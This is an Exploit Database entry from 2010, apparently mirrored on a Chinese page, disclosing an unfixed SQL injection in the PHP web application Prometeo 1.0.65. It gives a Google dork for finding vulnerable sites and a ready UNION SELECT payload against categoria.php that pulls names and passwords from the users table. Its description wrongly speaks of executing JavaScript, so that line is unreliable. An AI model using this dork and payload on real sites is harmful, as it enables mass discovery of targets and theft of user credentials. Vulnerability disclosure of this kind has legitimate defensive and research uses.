Prometeo 1.0.65 – SQL Injection

• Exploit Database
• 11 阅读

• 作者： Lord Tittis3000
  日期： 2010-08-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14806/

• **** ********** ********** /**/** /** **////// /////**////**//**/**/** /** /** //** /**/*********/** /**//**/**////////**/** /** //**** /**/** /**//*** ******** /** ///// ////////// 
  
  ================================= 
  Prometeo (vers. 1.0.65)-SQLi Vulnerability-=================================
  
  -Vulnerability ID: LD3-Product: Prometeo-Vendor: Prometeo (http://www.infomedia2000.it/prometeo/)-Vulnerability Type: SQL Injection-Status: Unfixed-Risk level: High-Credit: Network Security (http://www.netw0rksecurity.net/)
  
  -Vulnerability Details:User can execute arbitrary JavaScript code within the vulnerable application.An attacker can use browser to exploit this vulnerability.
  
  -Google Dork: inurl:categoria.php?ID= comune
  
  -Example: 
  http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--
  
  # Netw0rkSecurity.net [2010-08-26]